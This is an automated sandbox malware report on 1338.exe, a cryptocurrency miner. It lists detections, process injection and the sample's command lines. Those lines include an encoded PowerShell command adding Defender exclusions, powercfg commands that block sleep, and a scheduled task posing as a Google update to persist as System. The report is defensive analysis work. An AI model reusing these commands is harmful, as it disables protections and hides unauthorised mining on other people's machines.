Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1338.exe

Overview

General Information

Sample Name:1338.exe
Analysis ID:633539
MD5:ac711e6653707f0b1d245ff40d95385f
SHA1:279b9abaf000303983d6ecfb91e8b221b00fb198
SHA256:909409814d725477622728168035c3f2d259b5d8aa1ca77403d8c259bd7aba63
Tags:exe
Infos:

Detection

BitCoin Miner, SilentXMRMiner, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Antivirus / Scanner detection for submitted sample
Yara detected SilentXMRMiner
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected BitCoin Miner
Modifies power options to not sleep / hibernate
Writes to foreign memory regions
Found strings related to Crypto-Mining
Encrypted powershell cmdline option found
Allocates memory in foreign processes
Creates files in the system32 config directory
Injects a PE file into a foreign processes
Obfuscated command line found
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Potential dropper URLs found in powershell memory
Uses powercfg.exe to modify the power settings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 1338.exe (PID: 7044 cmdline: "C:\Users\user\Desktop\1338.exe" MD5: AC711E6653707F0B1D245FF40D95385F)
    • conhost.exe (PID: 7056 cmdline: C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\1338.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 7124 cmdline: C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6280 cmdline: powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 4992 cmdline: "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powercfg.exe (PID: 4680 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
        • powercfg.exe (PID: 6868 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
        • powercfg.exe (PID: 3392 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
        • powercfg.exe (PID: 6448 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • cmd.exe (PID: 6832 cmdline: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Google\Chrome\updater.exe^"' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 7000 cmdline: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Google\Chrome\updater.exe"' MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • cmd.exe (PID: 2508 cmdline: C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6772 cmdline: schtasks /run /tn "GoogleUpdateTaskMachineQC" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • updater.exe (PID: 6800 cmdline: C:\Program Files\Google\Chrome\updater.exe MD5: AC711E6653707F0B1D245FF40D95385F)
    • conhost.exe (PID: 6936 cmdline: C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3552 cmdline: C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6476 cmdline: powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 2252 cmdline: "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powercfg.exe (PID: 5800 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
        • powercfg.exe (PID: 6768 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
        • powercfg.exe (PID: 7100 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
        • powercfg.exe (PID: 4556 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • conhost.exe (PID: 6712 cmdline: C:\Windows\System32\conhost.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • conhost.exe (PID: 6236 cmdline: C:\Windows\System32\conhost.exe" "ossgiopsxz MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      Process Memory Space: conhost.exe PID: 6936CoinMiner_StringsDetects mining pool protocol string in ExecutableFlorian Roth
      • 0x81eb3:$sa1: stratum+tcp://
      • 0x85ca7:$sa1: stratum+tcp://
      • 0x12d467:$sa1: stratum+tcp://
      • 0x13125b:$sa1: stratum+tcp://
      Process Memory Space: conhost.exe PID: 6936JoeSecurity_bitcoinminerYara detected BitCoin MinerJoe Security
        Process Memory Space: conhost.exe PID: 6936JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          Click to see the 1 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          24.2.conhost.exe.27e10da3ca8.5.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            24.2.conhost.exe.27e10da3ca8.5.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              24.2.conhost.exe.27e112a3ce0.6.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                24.2.conhost.exe.27e10b23c70.4.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  24.2.conhost.exe.27e112a3ce0.6.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for submitted file
                    Source: 1338.exeVirustotal: Detection: 68%Perma Link
                    Source: 1338.exeMetadefender: Detection: 33%Perma Link
                    Source: 1338.exeReversingLabs: Detection: 73%
                    Antivirus / Scanner detection for submitted sample
                    Source: 1338.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Program Files\Google\Chrome\updater.exeAvira: detection malicious, Label: HEUR/AGEN.1205338
                    Multi AV Scanner detection for dropped file
                    Source: C:\Program Files\Google\Chrome\updater.exeVirustotal: Detection: 68%Perma Link
                    Source: C:\Program Files\Google\Chrome\updater.exeMetadefender: Detection: 33%Perma Link
                    Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 73%

                    Bitcoin Miner

                    barindex
                    Yara detected Xmrig cryptocurrency miner
                    Source: Yara matchFile source: 24.2.conhost.exe.27e10da3ca8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 24.2.conhost.exe.27e10da3ca8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 24.2.conhost.exe.27e112a3ce0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 24.2.conhost.exe.27e10b23c70.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 24.2.conhost.exe.27e112a3ce0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6936, type: MEMORYSTR
                    Yara detected SilentXMRMiner
                    Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6936, type: MEMORYSTR
                    Yara detected BitCoin Miner
                    Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6936, type: MEMORYSTR
                    Found strings related to Crypto-Mining
                    Source: conhost.exe, 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://-:x@exit:0
                    Source: conhost.exe, 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://-:x@exit:0
                    Source: C:\Windows\System32\conhost.exeDirectory created: C:\Program Files\Google\Chrome\updater.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeDirectory created: C:\Program Files\Google\LibsJump to behavior
                    Source: C:\Windows\System32\conhost.exeDirectory created: C:\Program Files\Google\TelemetryJump to behavior
                    Source: Binary string: H:\CRYPTOCOIN\Mandark-master\obj\x64\Release\ClassLibrary.pdb source: conhost.exe, 00000018.00000002.674440898.0000027E779F0000.00000004.08000000.00040000.00000000.sdmp

                    Networking

                    barindex
                    Potential dropper URLs found in powershell memory
                    Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
                    Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
                    Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
                    Source: powershell.exe, 00000004.00000002.479136799.000002986A060000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000003.532650408.0000023C451E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: powershell.exe, 00000004.00000002.479466307.000002986A4C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                    Source: powershell.exe, 00000004.00000003.442875745.000002986A154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: powershell.exe, 00000004.00000003.442875745.000002986A154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.coji
                    Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: conhost.exe, 00000001.00000002.516335707.000002779FFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.469069937.0000029851FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.599425355.0000023C45321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: conhost.exe, 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gnu.org/licenses/
                    Source: conhost.exe, 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonrpc.org/
                    Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: conhost.exe, 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/openwall/john/issues/3454#issuecomment-436899959
                    Source: powershell.exe, 00000004.00000002.478242785.00000298536E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000004.00000002.479136799.000002986A060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.vign.

                    System Summary

                    barindex
                    Uses powercfg.exe to modify the power settings
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: Process Memory Space: conhost.exe PID: 6936, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_frzn2qj0.jw3.ps1
                    Source: C:\Windows\System32\conhost.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logJump to behavior
                    Source: C:\Windows\System32\conhost.exeCode function: 1_2_000002779DE891061_2_000002779DE89106
                    Source: C:\Windows\System32\conhost.exeCode function: 1_2_000002779DE894D61_2_000002779DE894D6
                    Source: C:\Windows\System32\conhost.exeCode function: 1_2_000002779DE884D21_2_000002779DE884D2
                    Source: C:\Windows\System32\conhost.exeCode function: 1_2_000002779DE8990E1_2_000002779DE8990E
                    Source: C:\Windows\System32\conhost.exeCode function: 1_2_000002779DE89D6A1_2_000002779DE89D6A
                    Source: C:\Windows\System32\conhost.exeCode function: 1_2_00007FF9F1C358CE1_2_00007FF9F1C358CE
                    Source: C:\Windows\System32\conhost.exeCode function: 1_2_00007FF9F1C34B1E1_2_00007FF9F1C34B1E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF9F1B519584_2_00007FF9F1B51958
                    Source: C:\Windows\System32\conhost.exeCode function: 24_2_0000027E764F910624_2_0000027E764F9106
                    Source: C:\Windows\System32\conhost.exeCode function: 24_2_0000027E764F94D624_2_0000027E764F94D6
                    Source: C:\Windows\System32\conhost.exeCode function: 24_2_0000027E764F84D224_2_0000027E764F84D2
                    Source: C:\Windows\System32\conhost.exeCode function: 24_2_0000027E764F990E24_2_0000027E764F990E
                    Source: C:\Windows\System32\conhost.exeCode function: 24_2_0000027E764F9D6A24_2_0000027E764F9D6A
                    Source: C:\Windows\System32\conhost.exeCode function: 24_2_00007FF9F1C04AA624_2_00007FF9F1C04AA6
                    Source: C:\Windows\System32\conhost.exeCode function: 24_2_00007FF9F1C0585224_2_00007FF9F1C05852
                    Source: C:\Windows\System32\conhost.exeCode function: 24_2_00007FF9F1C003D824_2_00007FF9F1C003D8
                    Source: C:\Windows\System32\conhost.exeCode function: 41_2_00000286977B50D641_2_00000286977B50D6
                    Source: C:\Windows\System32\conhost.exeCode function: 41_2_00000286977B4D0641_2_00000286977B4D06
                    Source: C:\Windows\System32\conhost.exeCode function: 41_2_00000286977B596A41_2_00000286977B596A
                    Source: C:\Windows\System32\conhost.exeCode function: 41_2_00000286977B550E41_2_00000286977B550E
                    Source: C:\Windows\System32\conhost.exeCode function: 41_2_00000286977B40D241_2_00000286977B40D2
                    Source: C:\Windows\System32\conhost.exeCode function: 41_2_00007FF9F1C0453641_2_00007FF9F1C04536
                    Source: C:\Windows\System32\conhost.exeCode function: 41_2_00007FF9F1C052E241_2_00007FF9F1C052E2
                    Source: C:\Users\user\Desktop\1338.exeCode function: 0_2_004019C6 NtAllocateVirtualMemory,0_2_004019C6
                    Source: C:\Users\user\Desktop\1338.exeCode function: 0_2_00401946 NtCreateThreadEx,0_2_00401946
                    Source: C:\Users\user\Desktop\1338.exeCode function: 0_2_00401A06 NtProtectVirtualMemory,0_2_00401A06
                    Source: C:\Users\user\Desktop\1338.exeCode function: 0_2_00401986 NtWriteVirtualMemory,0_2_00401986
                    Source: C:\Windows\System32\conhost.exeCode function: 24_2_00007FF9F1C0690E NtUnmapViewOfSection,24_2_00007FF9F1C0690E
                    Source: C:\Windows\System32\conhost.exeCode function: 37_2_00401946 NtCreateThreadEx,37_2_00401946
                    Source: C:\Windows\System32\conhost.exeCode function: 37_2_00401986 NtWriteVirtualMemory,37_2_00401986
                    Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Chrome\updater.exe 909409814D725477622728168035C3F2D259B5D8AA1CA77403D8C259BD7ABA63
                    Source: 1338.exeStatic PE information: Section: .rdata ZLIB complexity 0.999571628982
                    Source: updater.exe.1.drStatic PE information: Section: .rdata ZLIB complexity 0.999571628982
                    Source: 1338.exeVirustotal: Detection: 68%
                    Source: 1338.exeMetadefender: Detection: 33%
                    Source: 1338.exeReversingLabs: Detection: 73%
                    Source: 1338.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\1338.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\1338.exe "C:\Users\user\Desktop\1338.exe"
                    Source: C:\Users\user\Desktop\1338.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\1338.exe
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Google\Chrome\updater.exe^"'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Google\Chrome\updater.exe"'
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /run /tn "GoogleUpdateTaskMachineQC"
                    Source: unknownProcess created: C:\Program Files\Google\Chrome\updater.exe C:\Program Files\Google\Chrome\updater.exe
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
